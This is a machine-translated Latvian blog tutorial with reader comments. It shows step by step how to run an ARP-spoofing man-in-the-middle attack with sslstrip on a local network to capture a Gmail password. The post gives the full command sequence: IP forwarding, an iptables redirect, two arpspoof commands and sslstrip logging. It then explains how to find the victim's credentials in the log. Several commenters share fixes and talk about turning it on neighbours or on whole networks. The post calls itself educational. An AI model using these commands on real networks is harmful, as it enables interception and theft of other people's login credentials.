ArpSpoofing un SSlstrip darbībā.

Sveiki Emuāru autori.

Šodien man ir neliels paraugs par to, cik bīstami var būt savienojums ar jebkuru tīklu bez drošības no tiem, kas patīk tik daudziem no mums.

Šodien es izmantoju ArpSpoofing ar Sslstrip, lai iegūtu Gmail paroli. Lai padarītu vidi kontrolētāku, esmu izveidojis kontu ar nosaukumu "testarp@gmail.com".

Un, tā kā man ļoti nepatīk preambulas, ķeramies pie lietas.

Es nekad neesmu atbildīgs par to, ko viņi var darīt ar šādu informāciju. Es to daru tikai izglītības nolūkos

VIDE

Šajā pārbaudē mums ir šāds:

1. Uzbrucējs: Debian Wheezy ir mans galddators vai galddators. No krātuvēm jūs varat instalēt sslstrip y sniff lai dabūtu krāpšanās

2. Upuris: Upuris ir Android planšetdators, kurš vēlas redzēt savu pastu tikai caur pārlūku.

3. Medijs: Vidus ir mans Cisco DPC2425 maršrutētājs

ADRESES.

Uzbrucēja adrese: 172.26.0.2

Maršrutētāja adrese: 172.26.0.1

Upura adrese: 172.26.0.8

Uzbrukums:

Lai mazliet vairāk saprastu, kā notiek uzbrukums, varat doties uz manu veco POST

Pirmā lieta, ko mēs izdarīsim šī uzbrukuma gadījumā, ir aktivizēt priekšu, lai mūsu dators varētu pārsūtīt informāciju upurim, nemanot. (Pretējā gadījumā tas būtu pakalpojumu atteikuma uzbrukums)

Tam mēs izmantosim:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Katra komanda tiešā konsoles logā.

Tagad, ja mēs darām asti -f desdelinux mēs redzam informāciju tiešraidē un tiešā veidā

momentuzņēmums1

Tātad, kā tad mēs iegūstam to, ko vēlamies?

Vispirms ievadīsim savu pastu planšetdatorā. Piesakoties, mēs redzam, ka mūsu konsolē parādās tūkstošiem un tūkstošiem lietu.

Tagad, kad tas ir pabeigts, atveram failu "desdelinux” ar nano

nano desdelinux

ar Control + W mēs meklējam kaut ko ar nosaukumu SECURE POST.

Un mēs redzēsim kaut ko līdzīgu šim.

momentuzņēmums2

Starp šo milzīgo līniju, kuru nevar redzēt, ir upura e-pasts un parole.

Tāpēc mēs skrienam pa labi, līdz beidzot redzam gaismu tuneļa galā.

momentuzņēmums3

Citā reizē mēs redzēsim, kā mēs varam nedaudz pasargāt sevi no šiem uzbrukumiem.

Sveicieni


Atstājiet savu komentāru

Jūsu e-pasta adrese netiks publicēta. Obligātie lauki ir atzīmēti ar *

*

*

  1. Atbildīgais par datiem: Migels Ángels Gatóns
  2. Datu mērķis: SPAM kontrole, komentāru pārvaldība.
  3. Legitimācija: jūsu piekrišana
  4. Datu paziņošana: Dati netiks paziņoti trešām personām, izņemot juridiskus pienākumus.
  5. Datu glabāšana: datu bāze, ko mitina Occentus Networks (ES)
  6. Tiesības: jebkurā laikā varat ierobežot, atjaunot un dzēst savu informāciju.

  1.   @Jlcux teica

    Es izmantoju šo iespēju, sakot, ka tad, kad ziņa tika publicēta, komandas nebija pareizas.

    Komandā iptables beigās trūkst 8080, kas atrodas citā rindā. Un tad arpspoof komandas bija vienā līnijā. Katra komanda atrodas uz citas līnijas.

    Cerams, ka redaktors to redz un var izlabot.

    Sveicieni.

    1.    Manuels de la Fuente teica

      Es veicu jūsu pieminētos labojumus, vai tas ir labi?

      Ja vēlaties ievietot kodu vēlamajā ierakstā, izmantojiet HTML skatu un pirms tā nosūtīšanas uz gaida pārbaudiet, vai raksts ir pareizs. Paldies.

  2.   Luis teica

    Drebuļi ir zināt, ka tie no mums, kuriem nav zināšanu, ir tik neaizsargāti. Ļoti laba informācija, pat ja es maz saprotu priekšmetu, es saprotu, cik svarīga. Paldies!
    Sveicieni

  3.   Giskards teica

    Bet tas darbojas tikai tad, ja uzbrucējs un upuris atrodas vienā tīklā. Jebkurā gadījumā man šķiet, ka, ja (atrodoties vienā tīklā) jūs izveidojat savienojumu, izmantojot HTTPS, tas nenotiek, jo dati tiek šifrēti PIRMS aiziešanas no datora. Ja izveidojat savienojumu, izmantojot HTTP (bez S), es domāju, ka pat aplūkojot tīkla kabeli, jūs redzat atslēgas.

    1.    @Jlcux teica

      Tā nav patiesība. Es uzlaužu Gmail paroli un, ja pamanāt, ka Gmail izmanto https. Tātad? Lieta ir tāda, ka, lai arī https ir drošs, tas ir atkarīgs no http. Tāpēc tas nav tik droši.

      Neatzīstieties tik daudz par https, ka S nav paredzēts Supermenam, bet gan "drošam"

    2.    Rten teica

      tas darbojas ar vai bez https, esmu to izmēģinājis ar specializētāku linux distro un darbojas bez problēmām

    3.    Manuels de la Fuente teica

      To var precīzi izmantot, lai iemācītu tiem, kas nozog jūsu Wi-Fi. 😀

      Tas ir vairāk vai mazāk līdzīgs tam, ko viņi teica sen Chema Alonso emuārā:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Matricas teica

        Ostia, lieliski, ko tā dara! / Un tad viņi man paranoiķiem saka katru reizi, kad izmantoju VPN, kad viņi dodas pārbaudīt bankas kontu ...). Starp citu, komentāros jāskatās, cik cilvēki ir ciniski ... ja beigās zog ...

        1.    3000 teica

          Tagad mums jāveic apmācība par to, kā izveidot un piedāvāt savu VPN pakalpojumu.

      2.    Daniel teica

        Stāsts, kuru jūs saistāt, ir ļoti interesants, tas pat šķiet romāniskas grāmatas cienīgs, un tas man liek atcerēties, kad izmantoju kaimiņu internetu un, kaut arī saku, ka zinu šo tēmu, es domāju, ka nekad nevarēju saskatīt patieso briesmu dimensijas, kādas man varētu būt pēdējais, par laimi man, viņi mainīja tikai paroli uz WPA2, un tieši šeit sākās mans stāsts ar ISP

    4.    Maurīcija teica

      Tāpēc virsrakstā teikts, ka Sslstrip darbojas.

      Tas darbojas, ja vien uzbrucējs atrodas pa vidu

  4.   tūliņ teica

    Kādu vilni jūs strādājat pie prizmas? -.-
    nē.
    Ko jūs gaidāt, lai nosūtītu pieprasījumu XD
    vēlējumiem
    labs amats

  5.   auroszx teica

    Interesanti, es vēlāk veikšu izglītojošu testu ... Varbūt es pat varētu noņemt WiFi paroli un mazliet izklaidēties 😛
    Jebkurā gadījumā, vai jūs varat darīt kaut ko līdzīgu, lai nosūtītu dažādas lapas uz tām, kuras pieprasīja mērķis? Piemēram, viņi vēlas atvērt Facebook, un es tos novirzīju uz Google? 😛

    1.    @Jlcux teica

      Jā. Bet tas viss ir ļoti atšķirīgs rullis.

      Varbūt es to ievietošu vēlāk.

  6.   pēdējais jauniņais teica

    ļoti labs ieraksts, šīs tēmas ir ļoti izglītojošas, tagad mums jāspēj novērst šo uzbrukumu, jo daži (piemēram, es) izveido savienojumu ar publiskiem tīkliem (piemēram, universitāte), būtu lietderīgi no tā izvairīties.

    Sveicieni!

  7.   tikai-cits-dl-lietotājs teica

    Man tas nedarbojās 🙁

  8.   voqer teica

    Kaut kas man šeit neizdodas, izņemot faktu, ka https savienojumi tiek šifrēti, izmantojot servera sertifikātu (kad sertifikāts ir jūsu mašīnā, jūsu pārlūkprogramma ir atbildīga par šifrēšanu) ar iptables, jūs novirzāt 80. portu (http) , nevis 443, kas ir https

    1.    @Jlcux teica

      Es arī tā domāju. Lieta ir tāda, ka, lai arī https ir "drošs", tas diemžēl ir atkarīgs no http. Tātad sslstrip to izmanto, tas pārlūkprogrammai liek domāt, ka tas izmanto https akreditācijas datus, taču tas tā nav.

      1.    voqer teica

        svētais sūds! bet pārlūkprogrammai vajadzētu redzēt tādu brīdinājumu kā "šis sertifikāts nāk no aizdomīgas vietnes vai tamlīdzīgi" ... man noteikti būs jāveic testi XD

        1.    @Jlcux teica

          Nē, pilnīgi nekas neiznāk.

  9.   tikai-cits-dl-lietotājs teica

    Tas man beidzot izdevās
    Esmu izveidojis savienojumu WEP tīklā ar paroli, un tas tik un tā man tieši parādīja paroli.

    Vaicājums. Vai jūs varat darīt šo pašu procedūru, bet visiem datoriem, kas ir savienoti ar tīklu, tā vietā, lai būtu viens upuris?

    1.    @Jlcux teica

      Jā tu vari. Bet es neesmu veicis eksperimentus. Izmēģiniet pats un pastāstiet mums, kā tas notiek.

  10.   19. Sinniks teica

    Vienīgais, ko es saņemu, ir tas, ka upura mašīna tiek izslēgta bezsaistē, bet sslstrip man neko nerāda: /

    1.    @Jlcux teica

      Uz brīdi jāatspējo ugunsmūris. Vai vismaz iespējojiet ienākošos savienojumus.

  11.   Black kungs teica

    Mēs un Zonde varējām redzēt tikai facebook lapas lietotājvārdu un paroli, gmail žurnālā neatradu nevienu rezultātu, arī man vajadzēja tikai arpspoof rindu «arpspoof -i -t«. No otras puses, cietušā mašīna nevarēja atvērt dažas lapas. Turpināšu izmeklēt, tas ir ļoti interesanti. Palīdzība tiem, kas izmanto Manjaro, instalējamās paketes ir: dsniff (šeit ir arpspoff), savīti un python2-pyopenssl. Sslstrip var lejupielādēt šeit: http://www.thoughtcrime.org/software/sslstrip/
    Lai to palaistu, $ python2 sslstrip.py
    Sveicieni.

  12.   Black kungs teica

    Tas neiznāca, bet arpspoof līnija ir: #arpspoof -i int -t ip-upuris ip-router

  13.   Gilberts teica

    izskatās, es daru tieši to, ko tu saki:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –mērķa ports 80 -j REDIRECT - uz portu 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    problēma ir tā, ka upurim, kurš ir vēl viens personālais dators, kas man ir šeit, manā istabā, man nav nekāda sakara ar to, ka man ir jārestartē maršrutētājs. Ko es varu darīt, lai man palīdzētu.

    Vēl viena lieta, ko es strādāju ar virtuālo mašīnu, un, izpildot komandu iwconfig, neparādās ne wlan0, ne tad, kad izpildu ifconfig, tomēr, ja manā virtuālajā mašīnā ir internets, ar eth0 saskarni.